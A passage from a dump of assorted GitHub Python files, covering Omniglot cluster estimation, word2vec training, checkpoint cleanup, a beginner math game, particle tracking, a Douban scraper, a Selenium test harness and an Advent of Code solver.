alphabetStr in omniglot_background_val_alphabets: \n labeled_loader = labeled_loaders[alphabetStr]\n args.num_val_cls = labeled_loader.num_classes\n\n l_num = len(labeled_loader.dataset)\n l_targets = np.zeros(l_num) \n l_feats = np.zeros((l_num, 1024))\n for _, (x, _, label, 
idx) in enumerate(labeled_loader):\n x = x.to(device)\n _, feat = model(x)\n feat = feat.view(x.size(0), -1)\n idx = idx.data.cpu().numpy()\n l_feats[idx, :] = feat.data.cpu().numpy()\n l_targets[idx] = label.data.cpu().numpy()\n\n l_classes = set(l_targets) \n num_lt_cls = int(round(len(l_classes)*args.split_ratio))\n lt_classes = set(random.sample(l_classes, num_lt_cls)) \n lv_classes = l_classes - lt_classes\n\n lt_feats = np.empty((0, l_feats.shape[1]))\n lt_targets = np.empty(0)\n for c in lt_classes:\n lt_feats = np.vstack((lt_feats, l_feats[l_targets==c]))\n lt_targets = np.append(lt_targets, l_targets[l_targets==c])\n\n lv_feats = np.empty((0, l_feats.shape[1]))\n lv_targets = np.empty(0)\n for c in lv_classes:\n lv_feats = np.vstack((lv_feats, l_feats[l_targets==c]))\n lv_targets = np.append(lv_targets, l_targets[l_targets==c])\n\n cvi_list = np.zeros(len(cand_k))\n acc_list = np.zeros(len(cand_k))\n cat_pred_list = np.zeros([len(cand_k),u_num+l_num])\n print('estimating K ...')\n for i in range(len(cand_k)):\n cvi_list[i], cat_pred_i = labeled_val_fun(np.concatenate((lv_feats, u_feats)), lt_feats, lt_targets, cand_k[i]+args.num_val_cls)\n cat_pred_list[i, :] = cat_pred_i\n acc_list[i] = cluster_acc(lv_targets, cat_pred_i[len(lt_targets): len(lt_targets)+len(lv_targets)])\n idx_cvi = np.max(np.argwhere(cvi_list==np.max(cvi_list)))\n idx_acc = np.max(np.argwhere(acc_list==np.max(acc_list)))\n\n idx_best = int(math.ceil((idx_cvi+idx_acc)*1.0/2))\n cat_pred = cat_pred_list[idx_best, :]\n cnt_cat = Counter(cat_pred.tolist())\n cnt_l = Counter(cat_pred[:l_num].tolist())\n cnt_ul = Counter(cat_pred[l_num:].tolist())\n bin_cat = [x[1] for x in sorted(cnt_cat.items())]\n bin_l = [x[1] for x in sorted(cnt_l.items())]\n bin_ul = [x[1] for x in sorted(cnt_ul.items())]\n expectation = u_num*1.0 / (cand_k[idx_best]+args.num_val_cls)\n best_k = np.sum(np.array(bin_ul)/np.max(bin_ul).astype(float)>args.min_max_ratio)\n print('current best K {}'.format(best_k))\n i_alpha = omniglot_background_val_alphabets.index(alphabetStr)\n best_ks[i_alpha] = best_k\n best_k = np.ceil(np.mean(best_ks)).astype(np.int32)\n kmeans = KMeans(n_clusters=best_k)\n u_pred = kmeans.fit_predict(u_feats).astype(np.int32) \n acc, nmi, ari = cluster_acc(u_targets, u_pred), nmi_score(u_targets, u_pred), ari_score(u_targets, u_pred)\n print('Final K {}, acc {:.4f}, nmi {:.4f}, ari {:.4f}'.format(best_k, acc, nmi, ari))\n return best_k\n\ndef labeled_val_fun(u_feats, l_feats, l_targets, k):\n if device=='cuda':\n torch.cuda.empty_cache()\n l_num=len(l_targets)\n kmeans = K_Means(k, pairwise_batch_size = 200)\n kmeans.fit_mix(torch.from_numpy(u_feats).to(device), torch.from_numpy(l_feats).to(device), torch.from_numpy(l_targets).to(device))\n cat_pred = kmeans.labels_.cpu().numpy() \n u_pred = cat_pred[l_num:]\n silh_score = silhouette_score(u_feats, u_pred)\n del kmeans\n return silh_score, cat_pred \n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(\n description='cluster',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--batch_size', default=128, type=int)\n parser.add_argument('--num_val_cls', default=0, type=int)\n parser.add_argument('--max_cand_k', default=100, type=int)\n parser.add_argument('--num_workers', default=2, type=int)\n parser.add_argument('--split_ratio', type=float, default=0.7)\n parser.add_argument('--min_max_ratio', type=float, default=0.01)\n parser.add_argument('--pretrain_dir', type=str, 
default='./data/experiments/pretrained/vgg6_omniglot_proto.pth')\n    parser.add_argument('--dataset_root', type=str, default='./data/datasets')\n    parser.add_argument('--seed', default=1, type=int)\n    args = parser.parse_args()\n    args.cuda = torch.cuda.is_available()\n    device = torch.device(\"cuda\" if args.cuda else \"cpu\")\n\n    seed_torch(args.seed)\n    model = VGG(n_layer='4+2', in_channels=1).to(device)\n    model.load_state_dict(torch.load(args.pretrain_dir), strict=False)\n    model.last = Identity()\n\n    labeled_loaders = {}\n    for alphabetStr in omniglot_background_val_alphabets: \n        _, labeled_loaders[alphabetStr] = omniglot_alphabet_func(alphabet=alphabetStr, background=True, root=args.dataset_root)(batch_size=args.batch_size, num_workers=args.num_workers)\n\n    acc = {}\n    nmi = {}\n    ari = {}\n    gtK = {}\n    predK = {}\n    for _, alphabetStr in omniglot_evaluation_alphabets_mapping.items():\n        _, eval_Dloader = omniglot_alphabet_func(alphabet=alphabetStr, background=False, root=args.dataset_root)(batch_size=args.batch_size, num_workers=args.num_workers)\n        gtK[alphabetStr] = eval_Dloader.num_classes\n        predK[alphabetStr] = estimate_k(model, eval_Dloader, labeled_loaders, args)\n    print('GT K:', gtK)\n    print('Pred K:', predK)\n    # dict.values() must be wrapped in list() before np.array in Python 3\n    print('Average K error: {:.4f}'.format(np.mean(abs(np.array(list(gtK.values()))-np.array(list(predK.values()))))))\n","repo_name":"k-han/DTC","sub_path":"omniglot_est_k.py","file_name":"omniglot_est_k.py","file_ext":"py","file_size_in_byte":7090,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"34"} +{"seq_id":"22968883168","text":"from collections import namedtuple\nimport config\nimport graph as graph_fns\nimport preprocessing\nimport tensorflow as tf\nimport time\nimport validator\n\nRunInfo = namedtuple(\"RunInfo\", [\n    \"session\",\n    \"graph\",\n    \"saver\",\n    \"batcher\",\n    \"validator\",\n    \"batch_size\",\n    \"window_size\",\n    \"batches_per_epoch\",\n    \"batches_per_logging\",\n    \"batches_per_save\",\n    \"batches_per_validation\",\n])\n\nBatchInfo = namedtuple(\"BatchInfo\", [\n    \"epoch_idx\",\n    \"batch_idx\",\n    \"inputs\",\n    \"labels\",\n])\n\ndef run_batch(run_info, batch_info):\n    ri, bi = run_info, batch_info\n\n    batch_training_loss, _ = ri.session.run(\n        [ri.graph.cost, ri.graph.optimizer],\n        feed_dict = {\n            ri.graph.inputs: bi.inputs,\n            ri.graph.labels: bi.labels\n        }\n    )\n\n    return batch_training_loss\n\ndef log_batches(run_info, batch_info, cumulative_loss, start_time):\n    ri, bi = run_info, batch_info\n    num_examples = ri.batches_per_logging * ri.batch_size\n    end_time = time.time()\n\n    average_loss = cumulative_loss / ri.batches_per_logging\n    examples_per_sec = int(num_examples / (end_time - start_time))\n    print(f\"Epoch: {bi.epoch_idx:03d} | \"\n          f\"Batch: {bi.batch_idx:04d} / {ri.batches_per_epoch:04d} | \"\n          f\"Avg Train Loss: {average_loss:.2f} | \"\n          f\"{examples_per_sec:04d} sec / example\"\n    )\n\ndef save(run_info, batch_info):\n    ri, bi = run_info, batch_info\n\n    run_info.saver.save(\n        run_info.session,\n        f\"{config.SAVE_BASENAME}-{bi.epoch_idx:03d}-{bi.batch_idx:04d}\"\n    )\n    print(f\"Epoch: {bi.epoch_idx:03d} | \"\n          f\"Batch: {bi.batch_idx:04d} / {ri.batches_per_epoch:04d} | \"\n          f\"Model saved!\"\n    )\n\ndef run_epoch(run_info, epoch_idx):\n    batches = run_info.batcher.batches(\n        run_info.batch_size, run_info.window_size\n    )\n\n    cumulative_loss, start_time = 0, time.time()\n    for batch_idx, (inputs, labels) in enumerate(batches, 1):\n        batch_info = BatchInfo(\n            epoch_idx = epoch_idx,\n            batch_idx = batch_idx,\n            inputs = inputs,\n            labels 
= labels,\n )\n\n cumulative_loss += run_batch(run_info, batch_info)\n\n should_log = (batch_idx % run_info.batches_per_logging) == 0\n if should_log:\n log_batches(\n run_info, batch_info, cumulative_loss, start_time\n )\n\n should_save = (batch_idx % run_info.batches_per_save) == 0\n if should_save:\n save(run_info, batch_info)\n should_validate = (\n (batch_idx % run_info.batches_per_validation) == 0\n )\n if should_validate:\n run_info.validator.run_and_log(run_info, batch_info)\n\n if should_log:\n # Doing this at the very end to not include the saving or\n # validation time.\n cumulative_loss, start_time = 0, time.time()\n\ndef run(session):\n batcher = preprocessing.Batcher(\n config.SUBSAMPLE_THRESHOLD, config.TEST_MODE\n )\n num_batches = batcher.num_batches(config.BATCH_SIZE)\n graph = graph_fns.build_graph(\n vocab_size = batcher.vocab_size(),\n num_embedding_units = config.NUM_EMBEDDING_UNITS,\n num_negative_samples = config.NUM_NEGATIVE_SAMPLES,\n )\n\n session.run(tf.global_variables_initializer())\n\n run_info = RunInfo(\n session = session,\n graph = graph,\n saver = tf.train.Saver(),\n batcher = batcher,\n validator = validator.Validator(\n batcher.vocab_size(),\n graph.embedding_matrix\n ),\n batch_size = config.BATCH_SIZE,\n window_size = config.WINDOW_SIZE,\n batches_per_epoch = num_batches,\n batches_per_logging = int(\n num_batches * config.LOGGING_FREQUENCY\n ),\n batches_per_save = int(\n num_batches * config.SAVING_FREQUENCY\n ),\n batches_per_validation = int(\n num_batches * config.VALIDATION_FREQUENCY\n ),\n )\n\n for epoch_idx in range(1, config.NUM_EPOCHS + 1):\n run_epoch(run_info, epoch_idx)\n\nwith tf.Session() as session:\n run(session)\n","repo_name":"ruggeri/coursera","sub_path":"foundations-of-deep-learning/06-word2vec/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"4588239645","text":"\"\"\"\nDeletes all non-latest checkpoints in all subdirectories recursively to save memory.\nWARNING: only do this if you do not want to resume any of your past model / RL training runs from an intermediate checkpoint!\n\"\"\"\n\nimport os\nimport glob\nimport sys\nimport tqdm\nfrom spirl.components.checkpointer import CheckpointHandler\n\n\ndef find_weight_folders():\n dirnames = []\n for root, dirs, files in os.walk(os.getcwd(), followlinks=True):\n for dir in dirs:\n if dir.endswith(\"weights\"): dirnames.append(os.path.join(root, dir))\n return dirnames\n\n\ndef delete_non_latest_checkpoint(dir):\n latest_checkpoint = CheckpointHandler.get_resume_ckpt_file(\"latest\", dir)\n checkpoint_names = glob.glob(os.path.abspath(dir) + \"/*.pth\")\n for file in checkpoint_names:\n if file != latest_checkpoint:\n os.remove(file)\n\n\ndef query_yes_no(question, default=None):\n \"\"\"Ask a yes/no question via raw_input() and return their answer.\n\n \"question\" is a string that is presented to the user.\n \"default\" is the presumed answer if the user just hits .\n It must be \"yes\" (the default), \"no\" or None (meaning\n an answer is required of the user).\n\n The \"answer\" return value is True for \"yes\" or False for \"no\".\n Copied from here: https://stackoverflow.com/questions/3041986/apt-command-line-interface-like-yes-no-input\n \"\"\"\n valid = {\"yes\": True, \"no\": False}\n if default is None:\n prompt = \" [yes/no] \"\n elif default == \"yes\":\n prompt = \" [YES/no] \"\n elif default == \"no\":\n prompt = \" [yes/NO] 
\"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = input().lower()\n if default is not None and choice == \"\":\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no'.\\n\")\n\n\nif __name__ == \"__main__\":\n if not query_yes_no(\"Deleting all non-latest checkpoints from {}, CONTINUE?\".format(os.getcwd())):\n print(\"Aborting...\")\n exit(0)\n\n checkpt_dirs = find_weight_folders()\n\n if not query_yes_no(\"Will delete checkpoints from {} directories, CONTINUE?\".format(len(checkpt_dirs))):\n print(\"Aborting...\")\n exit(0)\n\n for checkpt_dir in tqdm.tqdm(checkpt_dirs):\n delete_non_latest_checkpoint(checkpt_dir)\n\n print(\"Done!\")\n","repo_name":"clvrai/spirl","sub_path":"spirl/utils/scripts/clear_checkpoints.py","file_name":"clear_checkpoints.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"34"} +{"seq_id":"22419657844","text":"\n\nclass mathProcess():\n\n # does simple math problems\n\n # x = 0\n # y = 0\n\n def __init__(self,x,y):\n # user will enter two numbers to commit math upon\n self.x = x\n self.y = y\n\n def additionfxn(self,x,y):\n print (str(x) + \" plus \" + str(y) + \" results in \" + str(x+y) )\n\n def subtractfxn(self,x,y):\n print (str(x) + \" minus \" + str(y) + \" results in \" + str(x-y) )\n\n def divisionfxn(self,x,y):\n print (str(x) + \" divided by \" + str(y) + \" results in \" + str(x/y) )\n\n def multiplicationfxn(self,x,y):\n print (str(x) + \" multiplied by \" + str(y) + \" results in \" + str(x*y) )\n\n def remainderfxn(self,x,y):\n print (\"The remainder of \" + str(x) + \" divided by \" + str(y) + \" results in \" + str(x%y) )\n\n\n\nprint (\"Let's explore math problems!\")\nusernumX = input(\"What is your first number?\")\nusernumY = input(\"What is your second number?\")\n\nruntheprogram = True\n\nwhile runtheprogram == True:\n\n print(\"\")\n print(\"Let's play with math! Your first number is \" + str(usernumX) + \" and your second number is \" + str(usernumY) + \". What do you want to do with them?\")\n print(\"\")\n print(\"Type 1 to add them together\")\n print(\"Type 2 to subtract the second number from the first\")\n print(\"Type 3 to divide the first by the second\")\n print(\"Type 4 to multiply them both together\")\n print(\"Type 5 to get the remainder after you divide the first by the second\")\n print(\"Type 6 to change your numbers\")\n print(\"Type 7 to end the program\")\n print (\"\")\n userChoice = input(\"What is your choice: \")\n print (\"\")\n\n usetheprogram = mathProcess(usernumX, usernumY)\n\n if userChoice == 1:\n usetheprogram.additionfxn(usernumX, usernumY)\n\n elif userChoice == 2:\n usetheprogram.subtractfxn(usernumX, usernumY)\n\n elif userChoice == 3:\n usetheprogram.divisionfxn(usernumX, usernumY)\n\n elif userChoice == 4:\n usetheprogram.multiplicationfxn(usernumX, usernumY)\n\n elif userChoice == 5:\n usetheprogram.remainderfxn(usernumX, usernumY)\n\n elif userChoice == 6:\n usernumX = input(\"What do you want to change the first number to?\")\n usernumY = input(\"What do you want to change the second number to?\")\n\n elif userChoice == 7:\n print (\"Thanks for playing today! 
Now ending program.\")\n        runtheprogram = False\n\n    else:\n        print (\"That doesn't do anything!\")\n","repo_name":"mmhilty/babys-first-math-game","sub_path":"babysfirstmathgame.py","file_name":"babysfirstmathgame.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70852943137","text":"\"\"\"Module containing the LADiM Model class definition\"\"\"\n\nimport ladim\nimport ladim.out_netcdf\nimport ladim.ROMS\nimport ladim.state\nimport ladim.timekeeper\nimport ladim.tracker\nimport numpy as np\n\n# --------------\n# Settings\n# --------------\n\nstart_time = \"1989-05-24 12\"\nstop_time = \"1989-06-20\"\nreference_time = \"1970-01-01\"\n\ndata_file = \"../data/ocean_avg_0014.nc\"\n\nnum_particles = 1000\n\nadvection = \"EF\"\ndt = 3600  # seconds\n\noutput_variables = dict(\n    pid=dict(\n        encoding=dict(datatype=\"i4\", zlib=True),\n        attributes=dict(long_name=\"particle identifier\"),\n    ),\n    X=dict(\n        encoding=dict(datatype=\"f4\", zlib=True),\n        attributes=dict(long_name=\"particle X-coordinate\"),\n    ),\n    Y=dict(\n        encoding=dict(datatype=\"f4\", zlib=True),\n        attributes=dict(long_name=\"particle Y-coordinate\"),\n    ),\n    Z=dict(\n        encoding=dict(datatype=\"f4\", zlib=True),\n        attributes=dict(\n            long_name=\"particle depth\",\n            standard_name=\"depth below surface\",\n            units=\"m\",\n            positive=\"down\",\n        ),\n    ),\n)\n\n# ------------\n# Initiate\n# ------------\n\nstate = ladim.state.State()\n\ngrid = ladim.ROMS.Grid(filename=data_file)\n\ntimer = ladim.timekeeper.TimeKeeper(\n    start=start_time, stop=stop_time, dt=dt, reference=reference_time\n)\n\nforce = ladim.ROMS.Forcing(\n    filename=data_file, modules=dict(time=timer, grid=grid, state=state)\n)\n\noutput = ladim.out_netcdf.Output(\n    filename=\"out.nc\",\n    output_period=10800,  # 3 hours\n    instance_variables=output_variables,\n    modules=dict(state=state, time=timer, grid=grid),\n)\n\ntracker = ladim.tracker.Tracker(\n    advection=advection, modules=dict(state=state, time=timer, grid=grid, forcing=force)\n)\n\n# --- Initiate particle distribution\nx0, x1 = 63.55, 123.45\ny0, y1 = 90.0, 90\nX0 = np.linspace(x0, x1, num_particles)\nY0 = np.linspace(y0, y1, num_particles)\nZ0 = 5  # Fixed particle depth\nstate.append(X=X0, Y=Y0, Z=Z0)\n\n# ----------------\n# Time stepping\n# ----------------\n\nfor step in range(timer.Nsteps + 1):\n    if step > 0:\n        timer.update()\n\n    # --- Update forcing ---\n    force.update()\n\n    # --- Output\n    output.update()\n\n    # --- Update state to next time step\n    # Improve: no need to update after last write\n    tracker.update()\n\n# -----------\n# Clean up\n# -----------\n\nforce.close()\noutput.close()\n","repo_name":"bjornaa/ladim2","sub_path":"examples/line/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43068267313","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\"\"\"\n@author: Jock\n\"\"\"\n\nimport requests\nimport re\nimport time\n\n# get_html_text(url) fetches the page content\ndef get_html_text(url):\n    try:\n        r = requests.get(url) # fetch the complete page data\n        r.raise_for_status() # raise HTTPError if the status is not 200\n        return r.text # return the fetched page content as a string\n    except:\n        print(\"Request error\")\n        return \"\" # on exception, return an empty string\n\n# extract_data(data) extracts the page content\ndef extract_data(data):\n    # the list ls_page stores the movie info for one page\n    ls_page = []\n    # build the regex for the rank\n    reg_rank = re.compile('<em class=\"\">(.+?)<', re.S) # re.S lets '.' match newlines; the tag prefix is a reconstruction, the original pattern was lost in extraction\n    ls_rank = reg_rank.finditer(data)\n    # build the regex for the movie title\n    
reg_movie_name = re.compile('alt=\"(.+?)\"', re.S) # title pattern is a reconstruction; the original was garbled in extraction\n    ls_movie_name = reg_movie_name.finditer(data)\n    # build the regex for the director (pattern reconstructed)\n    reg_movie_director = re.compile('导演: (.+?)&', re.S)\n    ls_movie_director = reg_movie_director.finditer(data)\n    # build the regex for the year (pattern reconstructed)\n    reg_movie_year = re.compile('<br>(.+?)&', re.S)\n    ls_movie_year = reg_movie_year.finditer(data)\n    for i in range(25):\n        # ls_item stores a single movie's info, in order: rank, title, director, year\n        ls_item = []\n        ls_item.append(next(ls_rank).group(1)) # add the rank\n        ls_item.append(next(ls_movie_name).group(1)) # add the title\n        ls_item.append(next(ls_movie_director).group(1).split()[0]) # add the director\n        ls_item.append(next(ls_movie_year).group(1).split()[0]) # add the year\n        ls_page.append(ls_item)\n    return ls_page\n\n# process_data(ls_page,fpath) prints and saves the extracted info\ndef process_data(ls_page, fpath):\n    try:\n        with open(fpath,'a', encoding='utf-8') as f: # open the file in append mode\n            for i in ls_page:\n                try:\n                    s = ','.join(i) + '\\n'\n                    f.write(s) # write the data\n                except:\n                    continue\n    except:\n        # print(\"爬取失败\") # test statement\n        return \"\"\n\n# main function\ndef main():\n    fpath = r'C:\\Users\\admin\\Desktop\\豆瓣Top250电影.csv'\n    i = 0\n    while i < 250:\n        url = 'https://movie.douban.com/top250?start=' + str(i)\n        data = get_html_text(url)\n        print(len(data)) # for testing\n        ls_page = extract_data(data)\n        process_data(ls_page, fpath)\n        i += 25\n\n# measure elapsed time\ndef count_spend_time(func):\n    start_time = time.time()\n    func()\n    end_time = time.time()\n    time_dif = (end_time - start_time)\n    second = time_dif%60\n    minute = (time_dif//60)%60\n    hour = (time_dif//60)//60\n    print('spend ' + str(hour) + 'hours,' + str(minute) + 'minutes,' + str(second) + 'seconds')\n\nif __name__ == '__main__':\n    count_spend_time(main)\n\n\n","repo_name":"Jock2018/MyPythonSpiders","sub_path":"爬取豆瓣Top250电影.py","file_name":"爬取豆瓣Top250电影.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34148426333","text":"class Person:\r\n    def __init__(self, name, age):\r\n        self.name = name\r\n        self.age = age\r\n\r\n\r\nclass Shop:\r\n    def __init__(self, x, y):\r\n        self.x = x\r\n        self.y = y\r\n\r\n\r\ns1 = Shop('3', \"big\")\r\ns2 = Shop('5', 'small')\r\np1 = Person(\"JOHN\", 36)\r\n\r\nprint(p1.name)\r\nprint(p1.age)\r\nprint(s1.y)\r\nprint(s1.x)\r\nprint(s2.x, s2.y)\r\n","repo_name":"Mohamedrafik97/git-jenkins-ex","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12531209731","text":"import os\nfrom subprocess import Popen, PIPE\nimport unittest\nfrom selenium.webdriver import Firefox, FirefoxProfile, Remote, Chrome, ChromeOptions\nfrom selenium.webdriver.firefox.options import Options\nfrom .options import Config\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException,NoSuchElementException,ElementNotVisibleException,ElementNotInteractableException\nfrom time import sleep\n\nimport logging as log\nfrom pymongo import MongoClient\nfrom collections import ChainMap\n\nMONGO_URI = 'localhost:27017' # TODO: A centralized place for the mongouri, modifiable by config and options.py\nMONGO_DB = 'untapt_krypton'\n\n#TODO: Refactor method extensions to a new KryptonMethods class and use multiple inheritance to Krypton classes\nclass KrDriver(Firefox):\n\n    config_options = Config().options\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n    def wait_for_element(self, id=None, css_selector=None, class_name=None, xpath=None, link_text=None, timeout=20, optional=True ):\n        if id:\n            by = By.ID\n            selector = id\n        elif 
css_selector:\n by = By.CSS_SELECTOR\n selector = css_selector\n elif class_name:\n by = By.CLASS_NAME\n selector = class_name\n elif xpath:\n by = By.XPATH\n selector = xpath\n elif link_text:\n by = By.LINK_TEXT\n selector = link_text\n else:\n raise ValueError(\"wait_for_element must use one kwarg of: id, css_selector, class_name, xpath, link_text\")\n\n try:\n return KrWebElementWrapper(\n WebDriverWait(self, timeout).until(EC.presence_of_element_located((by, selector))))\n except TimeoutException as ex:\n if optional is True:\n log.info(f'wait_for_element: Timeout waiting for \"{selector}\" but doing nothing because \"optional\" is True')\n return KrMissingElement()\n else:\n log.error(f'wait_for_element: Timeout while waiting for element {selector}')\n raise TimeoutException(f'wait_for_element: Timeout while waiting for element {selector}', ex.screen, ex.stacktrace)\n\n\n def get_element(self, id=None, css_selector=None, class_name=None, xpath=None, link_text=None ):\n if id:\n by = By.ID\n selector = id\n elif css_selector:\n by = By.CSS_SELECTOR\n selector = css_selector\n elif class_name:\n by = By.CLASS_NAME\n selector = class_name\n elif xpath:\n by = By.XPATH\n selector = xpath\n elif link_text:\n by = By.LINK_TEXT\n selector = link_text\n else:\n raise ValueError(\"get_element must use one kwarg of: id, css_selector, class_name, xpath, link_text\")\n\n try:\n timeout=self.config_options['timeout']\n WebDriverWait(self, timeout).until(EC.presence_of_element_located((by, selector)))\n elms = self.find_elements(by, selector)\n if not elms:\n raise NoSuchElementException(f'get_element: Element {selector} not found on page {self.url}')\n if elms[0].is_displayed() or elms[0].is_enabled():\n return elms[0]\n else:\n raise ElementNotVisibleException(f'get_element: Element {selector} not displayed or not enabled on page {self.url}')\n\n\n except TimeoutException as ex:\n log.error(f'get_element: Timeout while waiting for element {selector}')\n raise TimeoutException(f'get_element: Timeout while waiting for element {selector} on page {self.url}', ex.screen, ex.stacktrace)\n\n def f_send_keys(self, text, id=None, css_selector=None, class_name=None, xpath=None, link_text=None):\n return self.get_element(id,css_selector,class_name,xpath,link_text).send_keys(text)\n\n def f_click(self, id=None, css_selector=None, class_name=None, xpath=None, link_text=None):\n return self.get_element(id,css_selector,class_name,xpath,link_text).click()\n\n def f_get_text(self, id=None, css_selector=None, class_name=None, xpath=None, link_text=None):\n return self.get_element(id,css_selector,class_name,xpath,link_text).Text\n\n def f_get_attr(self, attribute_name, id=None, css_selector=None, class_name=None, xpath=None, link_text=None):\n return self.get_element(id,css_selector,class_name,xpath,link_text).get_attribute(attribute_name)\n\n @property\n def url(self):\n return self.current_url\n\n def get_path(self, path):\n self.get(self.config_options['url'] + path)\n\n\nclass KrWebElementWrapper:\n\n def __init__(self, webelement):\n self.webelement = webelement\n\n def __getattr__(self, item):\n return getattr(self.unwrap(), item)\n\n def click(self):\n self.unwrap().click()\n return self\n\n def send_keys(self, *value):\n try:\n self.unwrap().send_keys(*value)\n return self\n except TypeError as e:\n raise TypeError(\"Don't know how to send this type to web element\\n\", e)\n\n def wait(self, seconds):\n sleep(seconds)\n return self\n\n def unwrap(self):\n return self.webelement\n\nclass 
KrMissingElement:\n\n def noop(self, *args, **kwargs):\n return None\n\n def __getattr__(self, item):\n return self.noop\n\n\nclass KrTestCase(unittest.TestCase):\n # config_options = Config().options\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n instance_config = getattr(self.__class__, 'config', {})\n self.config_options = ChainMap(instance_config, Config().options)\n\n\n @classmethod\n def setUpClass(cls):\n print(cls.__module__)\n\n for path, dirs, files in os.walk(f'./scenarios/{cls.__module__}'):\n if path[-8:] == '__data__':\n cls._runNodeWithDbAccess(path, 'preTest.js')\n\n print(path, dirs, files)\n\n @classmethod\n def _runNodeWithDbAccess(cls, path, file):\n pass\n\n def _buildFirefoxDriver(self, headless=False):\n profile = FirefoxProfile()\n profile.accept_untrusted_certs = True\n profile.headless = headless\n profile.set_preference('security.fileuri.strict_origin_policy', False)\n profile.set_preference(\"http.response.timeout\", self.config_options['timeout'])\n profile.set_preference(\"dom.max_script_run_time\", self.config_options['timeout'])\n o = Options()\n o.set_headless(self.config_options['headless'])\n return KrDriver(firefox_profile=profile, options=o)\n\n def _buildChromeDriver(self, headless=False):\n profile = FirefoxProfile()\n profile.accept_untrusted_certs = True\n profile.headless = headless\n profile.set_preference('security.fileuri.strict_origin_policy', False)\n o = Options()\n o.set_headless(self.config_options['headless'])\n return KrDriver(firefox_profile=profile, options=o)\n\n def _cleanupDbWrites(self):\n client = MongoClient(MONGO_URI)\n db = getattr(client, MONGO_DB)\n log.debug('Removing all documents with _kryptonData')\n for collection_name in db.collection_names():\n db[collection_name].remove({'_kryptonData': {'$exists': True}}, multi=True)\n\n def setUp(self):\n if os.path.exists(f'./scenarios/{self.__module__}/__data__/setUp.js'):\n log.debug('setUp.js hook detected')\n js = Popen(['node', f'./scenarios/{self.__module__}/__data__/setUp.js'])\n stdout, stderr = js.communicate()\n log.debug(f'{self.__module__}/__data__/setUp.js:{stdout}')\n\n log.debug(f'config_options for {self}:\\n{self.config_options}')\n\n self.browser = self.config_options['browser']\n self.url = self.config_options['url']\n self.cleanup = self.config_options['cleanup']\n if 'browser' not in self.config_options:\n self.driver = self._buildFirefoxDriver(headless=self.config_options['headless'])\n\n if self.browser == 'Firefox':\n self.driver = self._buildFirefoxDriver(headless=self.config_options['headless'])\n self.driver.set_page_load_timeout(self.config_options['timeout'])\n self.driver.implicitly_wait(self.config_options['timeout'])\n self.driver.set_script_timeout(self.config_options['timeout'])\n if 'url' in self.config_options:\n self.driver.get(self.config_options['url'])\n # print(self.__module__) TODO: this is the name that should be used with errors\n\n def tearDown(self):\n # if self.config_options.get('cleanup_db_writes', 'always') == 'always':\n # self._cleanupDbWrites()\n\n if self.config_options['cleanup'] == 'onfailure':\n # logic for test case\n pass\n elif self.config_options['cleanup'] == 'always':\n self.driver.quit()\n\n\n","repo_name":"untapt/kryptonic","sub_path":"kryptonic/krtest.py","file_name":"krtest.py","file_ext":"py","file_size_in_byte":9083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42007586731","text":"import os\nimport subprocess\nimport 
time\nimport webbrowser\n\nfrom config_parser.config import CONFIG\n\ndocs_dir = CONFIG.docs.docs_dir\nport = CONFIG.docs.port\nhost = 'localhost'\n\n\ndef docs_dev():\n shell = os.name == \"nt\"\n p = subprocess.Popen([\"python\", \"-m\", \"http.server\",\n str(port)], shell=shell, cwd=docs_dir)\n webbrowser.open(f'http://{host}:{port}')\n while True:\n try:\n time.sleep(1)\n except KeyboardInterrupt:\n p.terminate()\n break\n","repo_name":"cattidea/shoeprint-recognition","sub_path":"docs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"25711574800","text":"\"\"\"--- Day 2: Bathroom Security ---\"\"\"\n\ndef solve(keypad, instructions, start_row, start_col):\n\n row = start_row\n col = start_col\n\n code = []\n\n rc = len(keypad) - 1\n\n for instruction in instructions:\n if instruction == \"U\":\n if row > 0 and (keypad[row-1][col] is not None):\n row -= 1\n elif instruction == \"D\":\n if row < rc and (keypad[row+1][col] is not None):\n row += 1\n elif instruction == \"L\":\n if col > 0 and (keypad[row][col-1] is not None):\n col -= 1\n elif instruction == \"R\":\n if col < rc and (keypad[row][col+1] is not None):\n col += 1\n elif instruction == \"\\n\":\n code.append(keypad[row][col])\n\n return \"\".join(map(str, code))\n\nwith open(\"input/02.txt\", \"r\") as f:\n instructions = f.read()\n\n keypad = {}\n\n # part 1\n keypad[0] = [None, None, None, None, None]\n keypad[1] = [None, 1, 2, 3 , None]\n keypad[2] = [None, 4, 5, 6 , None]\n keypad[3] = [None, 7, 8, 9 , None]\n keypad[4] = [None, None, None, None, None]\n\n print(solve(keypad, instructions, 2, 